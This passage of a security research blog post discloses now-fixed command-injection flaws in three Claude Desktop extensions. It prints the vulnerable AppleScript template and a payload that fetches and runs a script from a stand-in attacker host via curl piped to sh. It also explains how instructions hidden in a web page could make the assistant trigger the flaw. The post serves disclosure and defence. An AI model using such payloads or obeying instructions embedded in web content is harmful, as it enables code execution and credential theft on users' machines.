Koi Research

PromptJacking: The Critical RCEs in Claude Desktop That Turn Questions Into Exploits

Oren Yomtov, November 5, 2025

TL;DR: Three official Claude extensions. 350,000+ downloads. All vulnerable to remote code execution.

Hi again. This is a reminder that while we often write about malicious extensions from unknown developers, or large-scale supply chain compromises, sometimes even the most trusted developers can make mistakes that may wreak havoc on your enterprise...

We've identified severe RCE vulnerabilities in three extensions that were written, published, and promoted by Anthropic themselves - the Chrome, iMessage, and Apple Notes connectors - which sit at the very top of Claude Desktop's extension marketplace. Every single one of them had the same issue: unsanitized command injection - a basic but critical security flaw.

In practice, that means a single malicious website could turn an innocent question like "Where can I play paddle in Brooklyn?" into arbitrary code execution on your machine. SSH keys, AWS credentials, browser passwords - all could be exposed simply because you asked Claude a question. No malware installation. No phishing link. Just a normal interaction with your AI assistant. Pretty nasty stuff.

All three vulnerabilities were confirmed as high-severity (CVSS 8.9) by Anthropic. But don't fret, they're all fixed now.

Let's Take A Step Back: What Are Even Claude Desktop Extensions?

Claude Desktop Extensions are packaged MCP servers that can be installed with a single click from Anthropic's extension marketplace. Each is distributed as an .mcpb bundle, essentially a zip archive containing the MCP server code and a manifest describing its functions. They're conceptually similar to Chrome Extensions (.crx), providing that same one-click install experience. Here's the difference: Chrome extensions run in a sandboxed browser process. Claude Desktop Extensions?
They run fully unsandboxed on your machine, with full system permissions. That means they can read any file, execute any command, access credentials, and modify system settings. They're not lightweight plugins - they're privileged executors bridging Claude's AI model and your operating system. This is what made the command injection vulnerability so severe.

The Vulnerability: Command Injection 101

The flaw itself is simple - which makes its presence in production code more surprising. Each MCP server exposed commands that accepted user-provided input and passed it directly into AppleScript commands without any sanitization or escaping. These AppleScript commands in turn could execute shell commands with full privileges.

For example, when Claude was asked to "open this URL in Chrome," the extension would construct an AppleScript string using template literals, directly interpolating the user-provided URL into commands like:

    tell application "Google Chrome" to open location "${url}"

The URL was inserted without any escaping or validation. A maliciously crafted URL could then break out of the string context and inject arbitrary AppleScript commands, which could execute shell commands with full privileges. The exploit was as simple as injecting:

    "& do shell script "curl https://attacker.com/trojan | sh"&"

This would result in the following AppleScript being executed:

    tell application "Google Chrome" to open location ""& do shell script "curl https://attacker.com/trojan | sh"&""

The quotes break out of the URL string, the & concatenates a malicious command, and AppleScript's do shell script executes arbitrary malicious code. This isn't an obscure bug class. It's one of the oldest and best-understood categories of software vulnerabilities.

From Question to Compromise: When Asking Your AI Assistant Gets You Pwned

You might think: "Sure, but no one's going to manually type a malicious command into Claude." And that's true.
The real risk comes from something else entirely: prompt injection through web content.

Claude routinely fetches and reads web pages to answer user questions. That's part of how it works: it searches the web, reads the top results, and summarizes them for you. Now imagine an attacker controls one of those web pages. They can make their page appear in search results or compromise legitimate ones. They can also serve special content when they detect Claude's user agent.

The attack flow

When Claude reads that page, it can unknowingly process instructions embedded in the content - instructions that exploit the vulnerable MCP extension. In this scenario, the chat client itself becomes the attack vector. The assistant, acting in good faith, executes malicious commands because it believes it's following legitimate instructions. That means:

Any web page in search results could become an attack surface
Compromised websites could silently trigger local code execution

Because these extensions ran with full system permissions, this chain of trust (chat client → web content → loca
High-severity Remote Code Execution (RCE) vulnerabilities were discovered in three official Claude Desktop extensions—specifically